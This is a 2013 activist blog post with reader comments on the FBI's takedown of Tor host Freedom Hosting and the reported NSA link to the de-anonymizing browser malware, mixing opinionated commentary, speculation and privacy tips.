Tuesday, August 6, 2013

NSA's Cyber Army Attacks the Navy's Tor Network, Gives Spoils to the FBI

Dees Illustration
Eric Blair
Activist Post

It was reported earlier this week that the FBI won a great victory by stopping the largest child porn distributor on the Internet. The FBI's victory lap was cut short when some of the details of how they did it were more closely examined.

What the FBI actually did was seize a hosting service on the hidden TOR Network.  The owner of the hosting service Freedom Hosting was not directly involved in the production or distribution of child porn, he just provided anonymous hosting used by pedophile pornographers.

The bigger question became how the FBI penetrated the supposedly anonymous TOR Network. That's where the story gets interesting.

TOR, short for The Onion Router, was originally developed by the Navy Research Laboratory to provide an anonymous secondary internetwork for the government to use.  Supposedly the project was abandoned by the Navy only to be picked up by open-source volunteers who now run the Tor Project.

Despite its beginnings as a government project, most believe TOR to be the best current option for online anonymity.  But does this recent compromise of TOR reveal that it's also part of the surveillance grid?  The long answer is complicated, but the short answer is no.

First, the NSA has been identified as the source of the malware bomb used to take down Freedom Hosting - not the FBI who claimed victory in the investigation and apprehension.

Arstechnica writes:
Malware planted on the servers of Freedom Hosting—the "hidden service" hosting provider on the Tor anonymized network brought down late last week—may have de-anonymized visitors to the sites running on that service. This issue could send identifying information about site visitors to an Internet Protocol address that was hard-coded into the script the malware injected into browsers. And it appears the IP address in question belongs to the National Security Agency (NSA).

Continued from Arstechnica:
Initial investigations traced the address to defense contractor SAIC, which provides a wide range of information technology and C4ISR (Command, Control, Communications, Computers, Intelligence, Surveillance, and Reconnaissance) support to the Department of Defense. The geolocation of the IP address corresponds to an SAIC facility in Arlington, Virginia. 
Further analysis using a DNS record tool from Robtex found that the address was actually part of several blocks of IP addresses allocated by SAIC to the NSA. This immediately spooked the researchers.
Two things are important to note about this revelation: First, it should be telling that the NSA had to resort to using a malware weapon instead of how they normally collect and decode Internet traffic -- which still can't be done on TOR; and, second, the open-source nature of TOR provided clear evidence of the breach and who caused it.

The TOR Project identified the specific problem and suggested that people who desire privacy must get the patched version of the TOR Browser Bundle, stop using Windows, and disable Javascript.  If your Windows OS is compromised, which it clearly is, it doesn't much matter how you sign in to the Internet.  And, according to TOR, Javascript was used by the NSA to breach an older version of the TOR Browser Bundle.

Some feel this entire attack is more about scaring people away from using privacy tools such as TOR than it is about fighting child porn because no actual pornographers were caught.  They remained anonymous. TOR is still considered secure if used properly.

But just as it was announced that the Drug Enforcement Agency was using warrantless NSA data to "investigate" drug crimes, it's clear from this case that the FBI used NSA's preemptive cyber attack on TOR for their own "investigation".

Does anyone see a pattern of abuse forming yet? The government is illegally collecting, sharing and using our private data to drum up suspicion of criminal activity, and then acting on it.

They're hoping headlines like "taking down the world's largest child porn dealer" will justify crushing Internet freedom and privacy. Expect more victory laps by the FBI or DEA, and the NSA catching more "credible threats". Keeping us safe, one privacy breach at a time.

Read other articles by Eric Blair Here

This article may be re-posted in full with attribution.


If you enjoy our work, please donate to keep our website going.


Anonymous said...

If TOR is so anonymous, I wonder how the NSA identified the "offending" server in the first place, in order to plant the malware.

Anonymous said...

With NSA's resources a brute-force approach may have been feasible. Deep packet inspection wouldn't work, so any analysis would be based on timing, packet size, destination and origin. Perhaps upload a unique file to any of the hidden sites, then connect a thousand clients from different IPs and track their traffic, latency etc. Even with just the metadata (obtained through mirroring backbone traffic) with enough time it would be possible to find out who's running the Yahoo equivalent of Tor.

That's assuming they didn't find a vulnerability in Freedom Hosting itself - keep in mind this operation already included the use of one 0day.

Chances are they vanned the Freedom Hosting admin and during his absence installed their own dial-home program.

Also, the IP points straight back to NSA. That's the malware equivalent of saving passwords as plaintext - you don't generally do that, but when you do, you do it explicitly and with a purpose.

And the purpose here is to build a dossier of incriminating materials on possible future thoughtcriminals as well as to spread fear and panic.

So the proper response would be to keep calm and carry on, paying more attention to security.

Anonymous said...

So NOTHING is safe from these guys!
EVERYTHING is a victim to their drilling technologies.

So, ALL YOUR financial data,
All stock portfolio data,
All retirement data,
All medical data,
All data of ANY TYPE....is accessed by the NSA.

This technology will drill into ALL YOUR DATA....FOREVER! Get that fact? They are going to be on your back forever!

No oversight, just blind trust....you're screwed!

Anonymous said...

must get the patched version of the TOR Browser Bundle, stop using Windows, and disable Javascript.

ok i get the patched tor,dump java but what could i use instead of windows...im years using it so what other os is like it or is viewed as safe???

Anglo Saxon said...

@ Anonymous ... August 7, 2013 at 6:30 PM: You're a hysterical mess. Sort yourself out you pathetic little shill.


@ Anonymous ... August 7, 2013 at 8:05 PM: Put down the Coca-Cola, and Big Mac with Fries, and recover your brain. These days, information on alternative O/Ss is easy to find. Pull your finger out and act!




** http://distrowatch.com/ ** !! Best resource !!

Anonymous said...

These are All Military inventions to Spread Disinformation to the General Public
TOR was a Trojan Horse designed to be Abandoned and taken by People that wanted a Complete Package Deal (aka A Free Ready Built Web Site) obviously they left a wide open Back Door
That way Users could take Administrative Controls but still be just a User within the Program
It doesn't amaze me that the Greedy would Grab a Intelligence agencies Computer Program and think that it's Safe to Use Freely

Anonymous said...

Zorin is a Linux distro close to Windows.

Anonymous said...


Anonymous said...

Use TAILS and boot from USB for TOR business.


Anonymous said...

Note that this was not a vulnerability of tor but rather (most likely) a problem on the Freedom Hoster's guy's end.

Also: there is i2p & freenet as an alternative to tor. And it's recommended to boot tails (http://tails.boum.org/) for tor.

Also don't forget to turn off the scripts in the Tor Browser Bundle and to update it right after there's a new patch out.

0jr said...

you're a fool if you ever thought it was safe and they ain't running it

Anonymous said...

Try Ubuntu Linux. Easy and looks somewhat like windows out of the box. Even has an app store (gui front end to it's package manager, APT). I prefer Arch and Debian, but that's me.

Post a Comment